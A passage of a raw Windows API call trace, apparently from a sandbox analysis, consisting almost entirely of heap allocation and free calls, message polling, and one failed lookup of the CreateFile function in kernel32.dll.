hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0033.559] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0033.559] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0033.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.560] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0033.560] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.560] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0033.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0033.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.560] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0033.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5a8 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8e0 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0033.561] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0033.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0033.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0033.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0033.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0033.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0033.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0033.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0033.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0033.564] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.566] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0033.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c838 [0033.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c838, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0033.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.566] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0033.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.566] RtlAllocateHeap 